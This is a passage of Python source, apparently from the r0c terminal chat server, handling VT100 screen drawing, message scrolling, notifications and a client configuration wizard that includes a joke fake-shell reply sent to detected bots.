self.user.nick_len + 2 + self.linepos + 1 - self.lineview,
)
# do it
if to_send:
self.say(to_send.encode(self.codec, "backslashreplace"))
def notify_new_hilight(self, uchan):
if uchan == self.user.active_chan:
return
# print('ping in {0} while in {1}'.format(uchan.nchan.get_name(), self.user.active_chan.nchan.get_name()))
if self.bell and len(uchan.nchan.uchans) > 1:
self.say(u"\x07".encode("utf-8"))
if self.show_hilight_tutorial:
self.show_hilight_tutorial = False
inf_u = self.user.chans[0]
inf_n = inf_u.nchan
cause = u""
if len(uchan.nchan.uchans) > 1:
ch_name = uchan.nchan.get_name()
if u" " in ch_name:
cause = u"\nsomeone sent you a private message.\n".format()
else:
cause = u"\nsomeone mentioned your nick in {0}.\n".format(ch_name)
self.world.send_chan_msg(
u"-nfo-",
inf_n,
u"""[about notifications]{0}
to jump through unread channels,
press CTRL-E or use the command /a
to disable audible alerts,
use the command /bn
""".format(
cause
),
)
self.user.new_active_chan = inf_u
self.refresh(False)
def update_top_bar(self, full_redraw):
"""no need to optimize this tbh"""
uchan = self.user.active_chan
nchan = uchan.nchan
topic = nchan.topic
if nchan.name is None:
title = uchan.alias
if uchan.alias == self.user.nick:
title += " (You) (why)"
else:
if len(uchan.nchan.uchans) < 2:
title += " (disconnected)"
topic = topic.replace(u"[[uch_a]]", title)
top_bar = u"\033[1H\033[44;48;5;235;38;5;220m{0}\033[K".format(topic)
if self.screen[0] != top_bar:
self.screen[0] = top_bar
return Util.trunc(top_bar, self.w)[0]
return u""
def update_status_bar(self, full_redraw):
preface = u"\033[{0}H\033[0;37;44;48;5;235m".format(self.h - self.y_status)
hhmmss = datetime.utcnow().strftime("%H%M%S")
uchan = self.user.active_chan
# print('@@@ active chan = {0}, other chans {1}'.format(
# self.user.active_chan.alias or self.user.active_chan.nchan.name,
# u', '.join(x.alias or x.nchan.name for x in self.user.chans)))
nbuf = self.user.chans.index(uchan)
nchan = uchan.nchan
chan_name = self.user.active_chan.nchan.name
chan_hash = u"#"
if chan_name is None:
# private chat
chan_hash = u"\033[1;37m"
chan_name = self.user.active_chan.alias
hilights = []
activity = []
for i, chan in enumerate(self.user.chans):
# print('testing {0} ({1}): h {2:1}, a {3:1}, dn {4:1}'.format(
# chan, chan.nchan.get_name(), chan.hilights, chan.activity, chan.display_notification))
if not chan.display_notification:
continue
if chan.hilights:
hilights.append(i)
if chan.activity:
activity.append(i)
if hilights:
hilights = u" \033[33mh:\033[1m{0}\033[22;39m".format(
u",".join(str(x) for x in hilights)
)
if activity:
activity = u" \033[32ma:\033[1m{0}\033[22;39m".format(
u",".join(str(x) for x in activity)
)
offscreen = None
if not uchan.lock_to_bottom and uchan.vis[-1].im < len(nchan.msgs):
offscreen = u" \033[1;36m+{0}\033[22;39m".format(
len(nchan.msgs) - uchan.vis[-1].im
)
line = Util.trunc(
u"{0}{1} {2}: {3}{4}{5}{6}{7}\033[K".format(
preface,
hhmmss,
nbuf,
chan_hash,
chan_name,
offscreen or u"",
hilights or u"",
activity or u"",
),
self.w,
)[0]
if not self.vt100:
now = int(time.time())
ret = u""
if (
full_redraw
or (now % 5 == 1)
or ((hilights or activity) and now % 2 == 1)
):
ret = u"\r{0} {1}> ".format(Util.strip_ansi(line), self.user.nick)
self.left_chrome = ret
return ret
elif full_redraw:
if self.screen[self.h - (self.y_status + 1)] != line:
self.screen[self.h - (self.y_status + 1)] = line
return Util.trunc(line, self.w)[0]
else:
old = self.screen[self.h - (self.y_status + 1)]
self.screen[self.h - (self.y_status + 1)] = line
if len(old) != len(line):
return Util.trunc(line, self.w)[0]
cutoff = len(preface) + len(hhmmss)
changed_part1 = old[:cutoff] != line[:cutoff]
changed_part2 = old[cutoff:] != line[cutoff:]
if changed_part2:
# send all of it
return Util.trunc(line, self.w)[0]
if changed_part1:
if int(time.time()) % 5 == 0:
# send just the timestamp
return line[:cutoff]
return u""
def compute_lineview(self, free_space, chi, ansi):
# ensure at least 1/3 of the available space is
# dedicated to text on the left side of the cursor
left_margin = int(free_space * 0.334)
if self.linepos - self.lineview < left_margin:
self.lineview = self.linepos - left_margin
if self.lineview < 0:
self.lineview = 0
# cursor is beyond right side of screen
elif self.linepos > self.lineview + free_space:
self.lineview = self.linepos - free_space
# text is partially displayed,
# but cursor is not sufficiently far to the right
midways = int(free_space * 0.5)
if self.lineview > 0 and len(chi) - self.lineview < midways:
self.lineview = len(chi) - midways
if self.lineview < 0:
# not sure if this could actually happen
# but the test is cheap enough so might as well
self.lineview = 0
start = 0
if self.lineview > 0:
# lineview is the first visible character to display,
# we want to include any colour codes that precede it
# so start from character lineview-1 into the ansi text
try:
start = chi[self.lineview - 1] + 1
except:
# seen in the wild, likely caused by that one guy with
# the stupidly long nickname; adding this just in case
Util.whoops("IT HAPPENED")
print("user = {0}".format(self.user.nick))
try:
n = self.user.active_chan.nchan.get_name()
print("chan = {0}".format(n))
except:
pass
print("linepos = " + str(self.linepos))
print("lineview = " + str(self.lineview))
print("chi = " + ",".join([str(x) for x in chi]))
print("line = " + Util.b2hex(self.linebuf.encode("utf-8")))
print("termsize = " + str(self.w) + "x" + str(self.h))
print("free_spa = " + str(free_space))
print("-" * 72)
# reset to sane defaults
self.lineview = 0
start = 0
end = len(ansi)
if self.lineview + free_space < len(chi) - 1: # off-by-one?
# no such concerns about control sequences after the last
# visible character; just don't read past the end of chi
end = chi[self.lineview + free_space]
return ansi[start:end]
def update_text_input(self, full_redraw):
if not self.vt100:
# cant believe this works
free_space = 72 - len(self.left_chrome)
p1 = self.linebuf[: self.linepos]
p2 = self.linebuf[self.linepos :]
ansi = Util.convert_color_codes(p1 + u"█" + p2, True)
chi = Util.visual_indices(ansi)
ret = self.compute_lineview(free_space, chi, ansi)
return Util.strip_ansi(ret)
if not full_redraw and not self.linebuf and self.linemode:
return u""
line_fmt = u"\033[0;36m{0}>\033[0m {1}"
print_fmt = u"\033[{0}H{1}\033[K"
if self.pending_size_request:
line = line_fmt.format(
self.user.nick[: self.user.nick_len],
u"#\033[7m please press ENTER (due to linemode) \033[0m",
)
if self.screen[self.h - (self.y_input + 1)] != line or full_redraw:
self.screen[self.h - (self.y_input + 1)] = line
return print_fmt.format(self.h - self.y_input, line)
return u""
if "\x0b" in self.linebuf or "\x0f" in self.linebuf:
ansi = Util.convert_color_codes(self.linebuf, True)
chi = Util.visual_indices(ansi)
else:
ansi = self.linebuf
chi = list(range(len(ansi)))
# nick chrome + final char on screen
free_space = self.w - (self.user.nick_len + 2 + 1)
if len(chi) <= free_space:
self.lineview = 0
else:
ansi = self.compute_lineview(free_space, chi, ansi)
if u"\033" in ansi:
# reset colours if the visible segment contains any
ansi += u"\033[0m"
line = line_fmt.format(self.user.nick[: self.user.nick_len], ansi)
if self.screen[self.h - (self.y_input + 1)] != line or full_redraw:
self.screen[self.h - (self.y_input + 1)] = line
return print_fmt.format(self.h - self.y_input, line)
return u""
def msg2ansi(self, msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w):
ts = datetime.utcfromtimestamp(msg.ts).strftime(ts_fmt)
txt = []
for ln in [x.rstrip() for x in msg.txt.split("\n")]:
if len(ln) < msg_w or Util.visual_length(ln) < msg_w:
txt.append(ln)
else:
txt.extend(Util.wrap(ln.rstrip(), msg_w, msg_w2))
for n, line in enumerate(txt):
if u"\033" in line:
if self.vt100:
line += u"\033[0m"
else:
line = Util.strip_ansi(line)
if n == 0:
c1 = u""
c2 = u""
if self.vt100:
c1 = u"\033[1m"
c2 = u"\033[0m"
if msg.user == u"-nfo-":
c1 = u"\033[0;32m"
elif msg.user == u"-err-":
c1 = u"\033[1;33m"
elif msg.user == u"***":
c1 = u"\033[36m"
elif msg.user != u"--" and self.cnicks:
try:
c1 = self.world.cntab[msg.user]
except:
crc = zlib.crc32(msg.user.encode("utf-8")) & 0xFFFFFFFF
c1 = Util.BRI_256[crc % len(Util.BRI_256)]
c1 = u"\033[1;48;5;16;38;5;{0}m".format(c1)
self.world.cntab[msg.user] = c1
txt[n] = msg_fmt.format(ts, c1, msg.user[:nick_w], c2, line)
else:
txt[n] = msg_nl + line
return txt
def update_chat_view(self, full_redraw, mark_messages_read, call_depth=0):
ch = self.user.active_chan
nch = ch.nchan
ret = u""
if call_depth > 3:
# the famous "should never happen"
Util.whoops("ch={0} usr={1}".format(nch.get_name(), self.user.nick))
return None
debug_scrolling = False
nick_w = None
if self.user.active_chan.alias == u"r0c-status":
nick_w = 6
if self.w >= 140:
nick_w = nick_w or 18
msg_w = self.w - (nick_w + 11)
msg_nl = u" " * (nick_w + 11)
ts_fmt = "%H:%M:%S"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
elif self.w >= 100:
nick_w = nick_w or 14
msg_w = self.w - (nick_w + 11)
msg_nl = u" " * (nick_w + 11)
ts_fmt = "%H:%M:%S"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
elif self.w >= 80:
nick_w = nick_w or 12
msg_w = self.w - (nick_w + 8)
msg_nl = u" " * (nick_w + 8)
ts_fmt = "%H%M%S"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
elif self.w >= 60:
nick_w = nick_w or 8
msg_w = self.w - (nick_w + 7)
msg_nl = u" " * (nick_w + 7)
ts_fmt = "%H:%M"
msg_fmt = u"{{0}} {{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
else:
nick_w = nick_w or 8
msg_w = self.w - (nick_w + 1)
msg_nl = u" " * (nick_w + 1)
ts_fmt = "%H%M"
msg_fmt = u"{{1}}{{2:>{0}}}{{3}} {{4}}".format(nick_w)
if self.align:
msg_w2 = msg_w
else:
msg_w2 = self.w - 2
msg_nl = u" "
# first ensure our cache is sane
if not ch.vis:
self.scroll_cmd = None
ch.lock_to_bottom = True
full_redraw = True
else:
if len(nch.msgs) <= ch.vis[0].im or nch.msgs[ch.vis[0].im] != ch.vis[0].msg:
try:
# some messages got pruned from the channel message list
if len(nch.msgs) <= ch.vis[0].im:
print(
"\033[1;33mcache inval: [{0}] in [{1}], |{2}| <= {3}\033[0m".format(
ch.user.nick,
nch.get_name(),
len(nch.msgs),
ch.vis[0].im,
)
)
else:
print(
"\033[1;33mcache inval: [{0}] in [{1}], #{2} <= #{3}\033[0m".format(
ch.user.nick,
nch.get_name(),
nch.msgs[ch.vis[0].im].sno,
ch.vis[0].msg.sno,
)
)
im0 = nch.msgs.index(ch.vis[0].msg)
for n, vis in enumerate(ch.vis):
vis.im = n + im0
except:
# the pruned messages included the visible ones,
# scroll client to bottom
print(
"\033[1;33mviewport NG: [{0}] in [{1}]\033[0m".format(
ch.user.nick, nch.get_name()
)
)
self.scroll_cmd = None
ch.lock_to_bottom = True
full_redraw = True
# we get painfully slow on join/parts when the
# channel has more than 800 messages or so
#
# thanks stress.py
if (
ch.lock_to_bottom
and not full_redraw
and nch.msgs[-1].sno - ch.vis[-1].msg.sno > self.h * 2
):
# lots of messages since last time, no point in scrolling
self.scroll_cmd = None
full_redraw = True
if full_redraw:
if self.scroll_cmd:
# all the scrolling code assumes a gradual refresh,
# this is cheap enough to almost be defendable
self.update_chat_view(False, False, call_depth + 1)
lines = []
lines_left = self.h - 3
if not ch.lock_to_bottom:
# fixed scroll position:
# oldest/top message will be added first
top_msg = ch.vis[0]
imsg = top_msg.im
ch.vis = []
for n, msg in enumerate(nch.msgs[imsg : imsg + self.h - 3]):
txt = self.msg2ansi(
msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w
)
if top_msg is not None and len(top_msg.txt) == len(txt):
car = top_msg.car
cdr = len(top_msg.txt)
n_vis = cdr - car
top_msg = None
if n_vis > lines_left:
delta = n_vis - lines_left
n_vis -= delta
cdr -= delta
else:
# not top message,
# or no previous top message to compare,
# or layout changed
n_vis = len(txt)
car = 0
cdr = n_vis
if n_vis > lines_left:
n_vis = lines_left
cdr = n_vis
if cdr > len(txt) or car >= cdr or n_vis == 0:
print("bug1 car{0} cdr{1} len{2}".format(car, cdr, len(txt)))
vmsg = Chat.VisMessage().c_new(msg, txt, imsg, car, cdr, ch)
ch.vis.append(vmsg)
for ln in vmsg.txt[car:cdr]:
lines.append(ln)
imsg += 1
lines_left -= n_vis
if lines_left <= 0:
break
if lines_left > 0 and ch.vis[0].msg != nch.msgs[0]:
# we didn't manage to fill the screen,
# TODO: go above vis[0] rather than cheat
ret = u""
lines = []
lines_left = self.h - 3
ch.lock_to_bottom = True
if ch.lock_to_bottom:
# lock to bottom, full redraw:
# newest/bottom message will be added first
ch.vis = []
for n, msg in enumerate(reversed(nch.msgs)):
imsg = (len(nch.msgs) - 1) - n
txt = self.msg2ansi(
msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w
)
n_vis = len(txt)
car = 0
cdr = n_vis
if n_vis >= lines_left:
n_vis = lines_left
car = cdr - n_vis
if cdr > len(txt) or car >= cdr or n_vis == 0:
print("bug2 car{0} cdr{1} len{2}".format(car, cdr, len(txt)))
vmsg = Chat.VisMessage().c_new(msg, txt, imsg, car, cdr, ch)
ch.vis.append(vmsg)
for ln in reversed(vmsg.txt[car:]):
lines.append(ln)
lines_left -= n_vis
if lines_left <= 0:
break
ch.vis.reverse()
lines.reverse()
if not self.vt100:
# ret = u'\r==========================\r\n'
# print(lines)
for ln in lines:
# print('sending {0} of {1}'.format(ln, len(lines)))
# if isinstance(lines, list):
# print('lines is list')
ret += u"\r{0}{1}\r\n".format(ln, u" " * ((self.w - len(ln)) - 2))
return ret
while len(lines) < self.h - 3:
lines.append(u"--")
for n in range(self.h - 3):
self.screen[n + 1] = lines[n]
ret += u"\033[{0}H\033[K{1}".format(n + 2, self.screen[n + 1])
else:
# full_redraw = False,
# do relative scrolling if necessary
t_steps = self.scroll_cmd # total number of scroll steps
n_steps = 0 # number of scroll steps performed
self.scroll_cmd = None
lines_in_use = 0
for msg in ch.vis:
lines_in_use += msg.cdr - msg.car
if t_steps:
# print('@@@ have scroll steps')
ch.lock_to_bottom = False
else:
# print('@@@ no scroll steps')
if not ch.lock_to_bottom:
# fixed viewport
# print('@@@ not lock to bottom')
return ret
if nch.msgs[-1] == ch.vis[-1].msg and not mark_messages_read:
# no new messages
# print('@@@ no new messages: {0}'.format(ch.vis[-1].txt[0][:40]))
return ret
# push all new messages
t_steps = 99999999999
abs_steps = abs(t_steps) # abs(total steps)
# print('@@@ gonna scroll {0} lines'.format(abs_steps))
# for msg in ch.vis:
# for ln in msg.txt[msg.car : msg.cdr]:
# print(ln)
# set scroll region: chat pane
if self.vt100:
ret += u"\033[2;{0}r".format(self.h - 2)
# first / last visible message might have lines off-screen;
# check those first
partial = None # currently offscreen text
partial_org = None # unmodified original
partial_old = None # currently visible segment
partial_new = None # currently invisible segment
# scrolling up; grab offscreen text at top
if t_steps < 0:
ref = ch.vis[0]
if ref.car != 0:
partial = Chat.VisMessage().c_segm(ref, 0, ref.car, 0, ref.car, ch)
partial_org = ref
partial_old = Chat.VisMessage().c_segm(
ref, ref.car, ref.cdr, 0, ref.cdr - ref.car, ch
)
ch.vis[0] = partial_old
if debug_scrolling:
print(
"@@@ slicing len({0}) car,cdr({1},{2}) into nlen({3})+olen({4}), ncar,ncdr({5},{6})? ocar,ocdr({7},{8})".format(
len(partial_org.txt),
partial_org.car,
partial_org.cdr,
len(partial.txt),
len(partial_old.txt),
0,
len(partial.txt),
partial_old.car,
partial_old.cdr,
)
)
for ln in partial.txt:
print(ln, "+new")
for ln in partial_old.txt:
print(ln, "---old")
else:
ref = ch.vis[-1]
if ref.cdr != len(ref.txt):
if debug_scrolling:
for n, ln in enumerate(ref.txt):
if n == ref.car:
anchor = "== car"
elif n == ref.cdr - 1:
anchor = "== cdr"
else:
anchor = ""
print(
"{0:2} {1} {2}".format(
n,
ln,
anchor,
)
)
if ref.cdr > len(ref.txt) or ref.car >= ref.cdr:
print(
"bug3 car{0} cdr{1} len{2}".format(
ref.car, ref.cdr, len(ref.txt)
)
)
partial = Chat.VisMessage().c_segm(
ref, ref.cdr, len(ref.txt), 0, len(ref.txt) - ref.cdr, ch
)
partial_org = ref
partial_old = Chat.VisMessage().c_segm(
ref, ref.car, ref.cdr, 0, ref.cdr - ref.car, ch
)
ch.vis[-1] = partial_old
if debug_scrolling:
print(
"@@@ slicing len({0}) car,cdr({1},{2}) into olen({3})+nlen({4}), ocar,ocdr({5},{6}) ncar,ncdr({7},{8})?".format(
len(partial_org.txt),
partial_org.car,
partial_org.cdr,
len(partial_old.txt),
len(partial.txt),
partial_old.car,
partial_old.cdr,
0,
len(partial.txt),
)
)
for ln in partial_old.txt:
print(ln, "---old")
for ln in partial.txt:
print(ln, "+new")
# get message offset to start from
if t_steps < 0:
imsg = ch.vis[0].im
else:
imsg = ch.vis[-1].im
if debug_scrolling:
print(
"@@@ num chan messages {0}, num vis messages {1}, retained {2} = {3}".format(
len(nch.msgs), len(ch.vis), imsg, nch.msgs[imsg].txt[:6]
)
)
dbg = ""
for m in ch.vis:
dbg += "{0}, ".format(m.im)
print("@@@ {0}".format(dbg))
# scroll until n_steps reaches abs_steps
while n_steps < abs_steps:
vmsg = None
if partial:
vmsg = partial
else:
if t_steps < 0:
imsg -= 1
if imsg < 0:
break
else:
imsg += 1
if imsg >= len(nch.msgs):
break
msg = nch.msgs[imsg]
txt = self.msg2ansi(
msg, msg_fmt, ts_fmt, msg_nl, msg_w, msg_w2, nick_w
)
vmsg = Chat.VisMessage().c_new(msg, txt, imsg, 0, len(txt), ch)
txt = vmsg.txt
msg = vmsg.msg
if t_steps < 0:
txt_order = reversed(txt)
else:
txt_order = txt
# write lines to send buffer
n_vis = 0
for ln in txt_order:
# print(u'@@@ vis{0:2} stp{1:2} += {2}'.format(n_vis, n_steps, ln))
if not self.vt100:
ret += u"\r{0}{1}\r\n".format(
ln, u" " * ((self.w - len(ln)) - 2)
)
elif lines_in_use < self.h - 3:
ret += u"\033[{0}H\033[K{1}".format(lines_in_use + 2, ln)
lines_in_use += 1
elif t_steps > 0:
# official way according to docs,
# doesn't work in windows terminals (xp..win10)
# ret += u'\033[{0}H\033[S\033[K{1}'.format(self.h - 2, ln)
# stopped working in WSL1 terminals on LTSC 2020-09
# ret += u"\033[{0}H\033D\033[K{1}".format(self.h - 2, ln)
# ok
ret += u"\033[{0}H\n\n\033[K{1}".format(self.h - 3, ln)
else:
# official way according to docs,
# doesn't work on inetutils-1.9.4
# ret += u'\033[2H\033[T\033[K{0}'.format(ln)
# also works
ret += u"\033[2H\033M\033[K{0}".format(ln)
n_vis += 1
n_steps += 1
if n_steps >= abs_steps:
break
if t_steps < 0:
new_cdr = len(txt)
new_car = new_cdr - n_vis
else:
new_car = 0
new_cdr = n_vis
vmsg.car = new_car
vmsg.cdr = new_cdr
# print('@@@ vismsg len({0}) car,cdr({1},{2}) -- {3}'.format(len(txt), new_car, new_cdr, txt[0][-30:]))
if vmsg.cdr > len(vmsg.txt) or vmsg.car >= vmsg.cdr or n_vis == 0:
print(
"bug4 car{0} cdr{1} len{2}".format(
vmsg.car, vmsg.cdr, len(vmsg.txt)
)
)
if t_steps < 0:
ch.vis.insert(0, vmsg)
else:
ch.vis.append(vmsg)
if partial:
partial = None
partial_new = vmsg
# release scroll region
if self.vt100:
ret += u"\033[r"
# trim away messages that went off-screen
if t_steps < 0:
vis_order = ch.vis
else:
vis_order = reversed(ch.vis)
n_msg = 0
ln_left = self.h - 3
for i, vmsg in enumerate(vis_order):
if ln_left <= 0:
break
n_msg += 1
msg_sz = vmsg.cdr - vmsg.car
if msg_sz >= ln_left:
if msg_sz > ln_left:
if t_steps < 0:
vmsg.cdr -= msg_sz - ln_left
else:
vmsg.car += msg_sz - ln_left
msg_sz = ln_left
ln_left -= msg_sz
# print('@@@ 1 {0}'.format('\r\n@@@ 1 '.join(vmsg.txt[vmsg.car : vmsg.cdr])))
if t_steps < 0:
ch.vis = ch.vis[:n_msg]
else:
ch.vis = ch.vis[-n_msg:]
# glue together the 2 parts forming the formerly off-screen message
if partial_old:
if partial_old not in ch.vis:
# old segment is gone, discard it
if t_steps > 0:
partial_new.car += len(partial_old.txt)
partial_new.cdr += len(partial_old.txt)
else:
# old segment is partially or fully visible
ch.vis.remove(partial_old)
if t_steps < 0:
partial_new.cdr += partial_old.cdr
else:
if debug_scrolling:
print(
"@@@ merging old({0},{1}) new({2},{3}) olen({4}) org({5},{6})".format(
partial_old.car,
partial_old.cdr,
partial_new.car,
partial_new.cdr,
len(partial_old.txt),
partial_org.car,
partial_org.cdr,
)
)
for n, ln in enumerate(partial_old.txt):
print(ln, "---old", n)
for n, ln in enumerate(partial_new.txt):
print(ln, "+new", n)
partial_new.car += partial_old.car
partial_new.cdr += partial_old.cdr
partial_new.car += partial_org.car
partial_new.cdr += partial_org.car
partial_new.txt = partial_org.txt
partial_new.msg = partial_org.msg
if debug_scrolling:
print(
"@@@ car,cdr ({0},{1})".format(partial_new.car, partial_new.cdr)
)
# update message read state on both sides
if self.vt100:
y_pos = 2
for i, vmsg in enumerate(ch.vis):
if vmsg.car > 0:
y_pos += vmsg.cdr - vmsg.car
continue
if vmsg.unread and vmsg.msg.sno <= ch.last_read:
# print('switching message unread -> read for {0}: this({1}) last_read({2})'.format(
# ch.user.nick, vmsg.msg.sno, ch.last_read))
vmsg.unread = False
vmsg.apply_markup()
v = vmsg.txt[0]
if v and not v.startswith(u" "):
ret += u"\033[{0}H{1} ".format(y_pos, v[: v.find(" ")])
y_pos += vmsg.cdr - vmsg.car
# update the server-side screen buffer
new_screen = [self.screen[0]]
for i, vmsg in enumerate(ch.vis):
for ln in vmsg.txt[vmsg.car : vmsg.cdr]:
new_screen.append(ln)
while len(new_screen) < self.h - 2:
new_screen.append(u"--")
new_screen.append(self.screen[-2])
new_screen.append(self.screen[-1])
old_screen = self.screen
self.screen = new_screen
ch.lock_to_bottom = ch.vis[-1].msg == nch.msgs[-1] and ch.vis[
-1
].cdr == len(ch.vis[-1].txt)
# print('@@@ lock_to_bottom:', ch.lock_to_bottom)
if len(self.screen) != self.h:
print(
"!!! new screen is {0} but client is {1}".format(
len(self.screen), self.h
)
)
for n, ln in enumerate(old_screen):
print("o", ln, n)
for n, ln in enumerate(new_screen):
print("new", ln, n)
time.sleep(100000)
if not self.vt100:
if t_steps < 0:
# rely on vt100 code to determine the new display
# then retransmit the full display (good enough)
ret = self.update_chat_view(True, True, call_depth + 1)
if ret is not None:
return u"\r\n" * self.h + ret
else:
return u"\r\n" * self.h + u"somethhing broke\r\n"
if len(nch.msgs) <= ch.vis[0].im or nch.msgs[ch.vis[0].im] != ch.vis[0].msg:
print()
print("\033[1;31mcache inval: bug in update_chat_view ;_;\033[0m")
if len(nch.msgs) < 10:
print("vis.im: " + ", ".join([str(x.im) for x in ch.vis]))
print("vis.sno: " + ", ".join([str(x.msg.sno) for x in ch.vis]))
print("nch.msgs: " + ", ".join([str(x.sno) for x in nch.msgs]))
print()
# lock to bottom if all recent messages are visible
if not ch.lock_to_bottom:
vlast = ch.vis[-1]
if nch.msgs[-1] == vlast.msg and vlast.cdr == len(vlast.txt):
ch.lock_to_bottom = True
# print('update_chat: {0} runes'.format(len(ret)))
# print(' scroll_cmd: {0}'.format(self.scroll_cmd))
return ret
def conf_wizard(self, growth):
# print('conf_wizard: {0}'.format(self.wizard_stage))
if self.adr[0] == "127.0.0.1":
if u"\x03" in self.in_text:
self.world.core.shutdown()
# print('{0:8s} {1:12s} {2}'.format(self.wizard_stage, self.in_text, self.in_text_full).replace('\r','.').replace('\n','.'))
if not self.is_bot:
if self.host.re_bot.search(self.in_text_full):
self.wizard_stage = "bot1"
self.is_bot = True
m = "{0} {1}".format(self.user.nick, self.adr[0])
self.host.schedule_kick(self, 69, " botkick: " + m)
print(" is bot: " + m)
if self.wizard_stage.startswith("bot"):
nline = u"\x0d\x0a\x00"
while True:
nl = next((i for i, ch in enumerate(self.in_text) if ch in nline), None)
if nl is None:
break
growth = 0
part1 = self.in_text[:nl]
self.in_text = self.in_text[nl + 1 :].lstrip(nline)
# print(b2hex(self.in_text.encode('utf-8')))
if self.wizard_stage == "bot1":
self.say(
"\r\nSEGMENTATION FAULT\r\n\r\nroot@IBM_3090:/# ".encode(
"utf-8"
)
)
self.wizard_stage = "bot2"
elif self.wizard_stage == "bot2":
try:
self.say(
"\r\nSYNTAX ERROR: {0}\r\n\r\nroot@IBM_3090:/# ".format(
part1.strip(u"\x0d\x0a\x00 ")
).encode("utf-8")
)
except:
self.say(
"\r\nSYNTAX ERROR\r\n\r\nroot@IBM_3090:/# ".encode("utf-8")
)
else:
Util.whoops("bad bot stage: {0}".format(self.wizard_stage))
if self.wizard_stage == "bot2":
self.say(self.in_text[-growth:].encode("utf-8"))
return
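        # ftop pushes old output off-screen with blank lines, then homes the cursor and clears the display;
        # sep draws a slash divider and moves the cursor back up two rows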
sep = u"{0}{1}{0}\033[2A".format(u"\n", u"/" * 71)
ftop = u"\n" * 20 + u"\033[H\033[J"
top = ftop + u" [ r0c configurator ]\n"
if self.wizard_stage == "start":
if not self.load_config():
self.wizard_stage = "qwer_prompt"
return self.conf_wizard(growth)
self.wizard_stage = "config_reuse"
self.in_text = u""
linemode = "Yes" if int(self.linemode) == 1 else "No"
vt100 = "Yes" if int(self.vt100) == 1 else "No"
echo_on = "Yes" if int(self.echo_on) == 1 else "No"
enc_ascii = None
enc_unicode = None
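            # codec_map alternates encoding name / sample-text key; pair them up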
for enc, uni in zip(self.codec_map[::2], self.codec_map[1::2]):
if self.codec == enc:
enc_ascii = self.codec_asc[uni]
enc_unicode = self.codec_uni[uni]
if not enc_ascii:
self.wizard_stage = "qwer_prompt"
return self.conf_wizard(growth)
to_say = (
(
top
+ u"""
verify that your config is still OK:
"""
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
if enc_ascii == "n/a":
to_say += u" unicode / extended characters: DISABLED\r\n".encode(
"utf-8"
)
else:
to_say += u' this says "{0}": " '.format(enc_ascii).encode("utf-8")
to_say += enc_unicode.encode(self.codec, "backslashreplace")
to_say += u'"\r\n'.encode("utf-8")
to_say += (
u"""\
\033[32m this sentence is{0} green \033[0m
""".format(
u"" if self.vt100 else " NOT"
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
ok = "your client is OK"
ng = "get better software"
to_say += (
u"""
technical details:
linemode: {l_c} ({l_g})
colors: {c_c} ({c_g})
echo: {e_c} ({e_g})
encoding: {enc_c} + {r_c}{slowmo}
Y: correct; continue
N: use another config
press Y or N, followed by [Enter]
""".format(
l_c=linemode.ljust(3),
c_c=vt100.ljust(3),
e_c=echo_on.ljust(3),
r_c=Util.b2hex(self.crlf.encode("utf-8")),
l_g=ok if not self.linemode else ng,
c_g=ok if self.vt100 else ng,
e_g=ok if not self.echo_on else ng,
enc_c=self.codec,
slowmo="\n slowmo: ENABLED" if self.slowmo_tx else "",
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
self.say(to_say)
return
if self.wizard_stage.startswith("iface_then_"):
text = self.in_text.lower()
if u"y" in text:
ofs = self.wizard_stage.find("_then_")
self.wizard_stage = self.wizard_stage[ofs + 6 :]
elif u"n" in text:
self.host.part(self)
if self.wizard_stage == "config_reuse":
delta = len(self.in_text) - self.wizard_lastlen
self.wizard_lastlen = len(self.in_text)
if self.wizard_mindelta > delta:
self.wizard_mindelta = delta
ret_ok = self.determine_retkey(True)
if ret_ok is None:
return
text = self.in_text.lower()
if u"y" in text:
text = text[text.rfind(u"y") :]
looks_like_linemode = self.wizard_mindelta > 1
self.wizard_reuse_errors = []
if self.linemode != looks_like_linemode:
self.wizard_reuse_errors.append("linemode changed")
if not ret_ok:
self.wizard_reuse_errors.append("retkey changed")
if self.wizard_reuse_errors:
self.default_config()
if not self.check_correct_iface("reuse_impossible"):
return
else:
self.reassign_retkey(self.crlf)
if not self.check_correct_iface("end"):
return
elif u"n" in text:
self.default_config()
self.user.set_rand_nick()
if not self.check_correct_iface("qwer_prompt"):
return
if self.wizard_stage == "reuse_impossible":
self.wizard_stage = "qwer_read"
self.wizard_lastlen = 0
self.in_text = u""
self.say(
(
top
+ u"""
sorry, your config is definitely incorrect:
-- {0}
type the text below, then hit [Enter]:
qwer asdf
""".format(
"\n -- ".join(self.wizard_reuse_errors)
)
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
# \033[10Hasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf
return
if self.wizard_stage == "qwer_prompt":
self.wizard_stage = "qwer_read"
self.in_text = u""
self.say(
(
top
+ u"""
type the text below, then hit [Enter]:
qwer asdf
"""
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
# \033[10Hasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf
return
if self.wizard_stage == "qwer_read":
nline = b"\x0d\x0a\x00"
btext = self.in_text.encode("utf-8")
delta = len(self.in_text) - self.wizard_lastlen
self.wizard_lastlen = len(self.in_text)
if delta > 1:
# acceptable if delta is exactly 2
# and the final characters are newline-ish
print(
"client burst {0} {1} {2}".format(
self.user.nick, self.adr[0], delta
)
)
if delta > 2 or btext[-1] not in nline:
if self.wizard_maxdelta < delta:
self.wizard_maxdelta = delta
# if any(ch in btext for ch in nline):
nl_a = self.determine_retkey()
if nl_a is not None:
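                # heuristic: input arriving in large bursts implies a line-buffered client with local echo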
if self.wizard_maxdelta >= nl_a / 2:
self.echo_on = True
self.linemode = True
print(
"setting linemode+echo since d{0} and {1}ch; {2}".format(
self.wizard_maxdelta,
len(self.in_text),
Util.b2hex(self.in_text.encode("utf-8")),
)
)
self.wizard_stage = "echo"
join_ch = None
